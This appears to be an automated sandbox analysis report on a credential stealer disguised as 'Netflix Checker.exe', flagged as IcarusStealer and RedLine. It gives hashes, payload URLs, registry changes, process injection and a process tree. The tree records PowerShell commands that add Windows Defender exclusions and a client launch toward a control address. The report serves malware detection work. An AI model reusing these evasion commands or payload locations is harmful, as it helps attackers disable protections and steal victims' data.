Analysis
-
max time kernel
20s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
01/05/2023, 19:52
Static task
static1
Behavioral task
behavioral1
Sample
Netflix Checker.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Netflix Checker.exe
Resource
win10v2004-20230220-en
General
-
Target
Netflix Checker.exe
-
Size
643KB
-
MD5
9c1f23b29ee709485823ccf2eb6c5037
-
SHA1
f68f8a0a7895c5a2dec90b86b735b9e3e45f07e0
-
SHA256
086e5a0d6feaae1da9a93b7eccf5f897e13713e58cc6a2ba532ee7fb76be0cef
-
SHA512
48c88a3ae5374f414c416553b0ade380c4201bc3f0eb7955acc5109ace800ff702d96ca87106fb249366f495aa1d28a239a303c2220d08169cd62fe91ad5745d
-
SSDEEP
12288:eXAgyuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+QD:WkZ6N6LqQzJqk0
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
Detects Redline Stealer samples 2 IoCs
This rule detects the presence of Redline Stealer samples based on their unique strings.
resource yara_rule behavioral2/memory/492-158-0x0000000005930000-0x0000000005F58000-memory.dmp redline_stealer behavioral2/memory/3952-168-0x0000000005D20000-0x0000000005D86000-memory.dmp redline_stealer -
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation Netflix Checker.exe -
Executes dropped EXE 1 IoCs
pid Process 2672 Start.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2988 set thread context of 1644 2988 Netflix Checker.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-144354903-2550862337-1367551827-1000\{313FF093-48AF-4E6C-9337-FE713BB603B2} explorer.exe Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2988 Netflix Checker.exe 2672 Start.exe 2672 Start.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 2988 Netflix Checker.exe Token: SeShutdownPrivilege 1332 explorer.exe Token: SeCreatePagefilePrivilege 1332 explorer.exe Token: SeShutdownPrivilege 1332 explorer.exe Token: SeCreatePagefilePrivilege 1332 explorer.exe Token: SeDebugPrivilege 1644 cvtres.exe Token: SeShutdownPrivilege 1332 explorer.exe Token: SeCreatePagefilePrivilege 1332 explorer.exe Token: SeShutdownPrivilege 1332 explorer.exe Token: SeCreatePagefilePrivilege 1332 explorer.exe Token: SeShutdownPrivilege 1332 explorer.exe Token: SeCreatePagefilePrivilege 1332 explorer.exe Token: SeShutdownPrivilege 1332 explorer.exe Token: SeCreatePagefilePrivilege 1332 explorer.exe Token: SeShutdownPrivilege 1332 explorer.exe Token: SeCreatePagefilePrivilege 1332 explorer.exe Token: SeDebugPrivilege 2672 Start.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe 1332 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3180 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 2988 wrote to memory of 2784 2988 Netflix Checker.exe 86 PID 2988 wrote to memory of 2784 2988 Netflix Checker.exe 86 PID 2988 wrote to memory of 2784 2988 Netflix Checker.exe 86 PID 2784 wrote to memory of 1108 2784 csc.exe 87 PID 2784 wrote to memory of 1108 2784 csc.exe 87 PID 2784 wrote to memory of 1108 2784 csc.exe 87 PID 2988 wrote to memory of 1332 2988 Netflix Checker.exe 88 PID 2988 wrote to memory of 1332 2988 Netflix Checker.exe 88 PID 2988 wrote to memory of 1644 2988 Netflix Checker.exe 89 PID 2988 wrote to memory of 1644 2988 Netflix Checker.exe 89 PID 2988 wrote to memory of 1644 2988 Netflix Checker.exe 89 PID 2988 wrote to memory of 1644 2988 Netflix Checker.exe 89 PID 2988 wrote to memory of 1644 2988 Netflix Checker.exe 89 PID 2988 wrote to memory of 1644 2988 Netflix Checker.exe 89 PID 2988 wrote to memory of 1644 2988 Netflix Checker.exe 89 PID 2988 wrote to memory of 1644 2988 Netflix Checker.exe 89 PID 2988 wrote to memory of 2312 2988 Netflix Checker.exe 93 PID 2988 wrote to memory of 2312 2988 Netflix Checker.exe 93 PID 2988 wrote to memory of 2312 2988 Netflix Checker.exe 93 PID 1644 wrote to memory of 2240 1644 cvtres.exe 92 PID 1644 wrote to memory of 2240 1644 cvtres.exe 92 PID 1644 wrote to memory of 2240 1644 cvtres.exe 92 PID 1644 wrote to memory of 1992 1644 cvtres.exe 96 PID 1644 wrote to memory of 1992 1644 cvtres.exe 96 PID 1644 wrote to memory of 1992 1644 cvtres.exe 96 PID 2312 wrote to memory of 2672 2312 cmd.exe 98 PID 2312 wrote to memory of 2672 2312 cmd.exe 98 PID 2240 wrote to memory of 492 2240 cmd.exe 100 PID 2240 wrote to memory of 492 2240 cmd.exe 100 PID 2240 wrote to memory of 492 2240 cmd.exe 100 PID 1992 wrote to memory of 3952 1992 cmd.exe 101 PID 1992 wrote to memory of 3952 1992 cmd.exe 101 PID 1992 wrote to memory of 3952 1992 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Netflix Checker.exe"C:\Users\Admin\AppData\Local\Temp\Netflix Checker.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d1jalohf\d1jalohf.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES322C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB3BCD603EE54A2880EB431C61909858.TMP"3⤵PID:1108
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1332
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 192.168.0.162 8880 vUiuCXqqM2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe4⤵PID:492
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe4⤵PID:3952
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Users\Admin\AppData\Local\Temp\Start.exeC:\Users\Admin\AppData\Local\Temp\Start.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3180
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3204
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
55KB
MD55b3149d7e3a7d18dd39ff6d3bc1fb0d2
SHA1bd2fa8b8988c7065e9f3ed1b4da2380a7dd555cf
SHA2564a0553c3e144bd7cda82fb2c5a9711396b28f60ead3c60a1e9f105897be14d88
SHA512877085dc160c4b24dc3334cc0e025640a3dc91d4cf5c6a0f4ce33dde9d23791f6e3a2501b1a2651fc8f3e62fb9d8949f29cb10363544d447d32a69f400d82bb7
-
Filesize
16KB
MD5d36dba5bd60f117dd670103615ab4962
SHA1a324bf38fb670c234b9c34af5748b5dce9a71859
SHA256cae4e88b373cc9ba39ec90b621d8317735787771496241fb775a250e443387a4
SHA512b0246673873a8f668f00df6d00d175cdfc6fd11f3a4a613dd980d58e3e68e23435be172f4ce2fd37a7b65ca7c6af5e69cb2fad477f294613127ed8bba68f8cc2
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}
Filesize36KB
MD58aaad0f4eb7d3c65f81c6e6b496ba889
SHA1231237a501b9433c292991e4ec200b25c1589050
SHA256813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1
SHA5121a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe
Filesize36KB
MD594b56d65a8b7f7253aeacac345d4b096
SHA17e11e248ae804d3647479a4fe5f03835a1eee4bc
SHA2560f312587a999305794730da6f2198c82a346e64211e2fb054256102ac70315be
SHA512538cc0c1b4dc66e8a3c6ca9a17ddac128441874248589bcc6c88b64ad7d3b93ff143867d6fad0002cbb4584e951d0e82441c350396e6d59b73207a3ffe0fc055
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133274446728997785.txt
Filesize75KB
MD565019a5db517d9fb830d8a57406a03ea
SHA1817faf2ffe8461f653519e7bd96e7ee75021c891
SHA2563ae88b3a99e6b785bdb44760790bc03ac722ef5b673ad5b3ca49b5cc5eecf84f
SHA512bcc985d3fa48efcbb4a334b1a341a6686ef6c69f237d6d9bdcd9885696d148519ab824b9150194d783cb03189c1cc00a483f1b73ebce323f1f6a303a05b8ea62
-
Filesize
1KB
MD53035bd8541e6b3696ee529083d615b06
SHA1b7b70a375ff6d2f9f019b83d5bf264feef51b650
SHA256aefaad427c7c92f525f38771ca0d0f728b16ccff20403a16ebd1537d111a6535
SHA5129224ca3dac8179841437d3f4b52948808384db62168aa957826e723c9900fa6bb801f6ea7a3ad9c74bfd08ef221d8c1b83e6c7ed11dc4e6eb20f19f8d7921503
-
Filesize
4KB
MD50afcc0acf8a474c01d70a305f36957ae
SHA19e364637913fb211a0c76ad106fcbfb377e51015
SHA25626f673de63d5a9e2b11ba40bdcb02142c1202c8a41c8c85ab0ae01623ecd5239
SHA51206a812748ea0d43ace98bb8715859ae2848121239e67ccb848b394213b56db6a858a79b70b2a41c990fd8d2dfe52826eea5e20c3bdd066a890ccaafdca431b4b
-
Filesize
4KB
MD50afcc0acf8a474c01d70a305f36957ae
SHA19e364637913fb211a0c76ad106fcbfb377e51015
SHA25626f673de63d5a9e2b11ba40bdcb02142c1202c8a41c8c85ab0ae01623ecd5239
SHA51206a812748ea0d43ace98bb8715859ae2848121239e67ccb848b394213b56db6a858a79b70b2a41c990fd8d2dfe52826eea5e20c3bdd066a890ccaafdca431b4b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5810535a8ae563d6aa53635a1bb1206ff
SHA1f5ba39f1a455eb61efe5022b524892249ee75dce
SHA2567f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f
SHA5125662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
447B
MD5b87d320ec583cdb8226315672a13450c
SHA15476f0687f3f980fcb8147ddbb1fe995aed2a667
SHA25646219815f6eeb816c9105da29f1fd6845d18d10a7aebc17cc5f02b7633d83d72
SHA51218e8b77dfecf649cc92d380ca57d053094e6aade417009d9e86835158b929cd2bf7f5b4163c91e62406054741f9ec49f191f6cbc9f51f6afea8e120306bc6f9d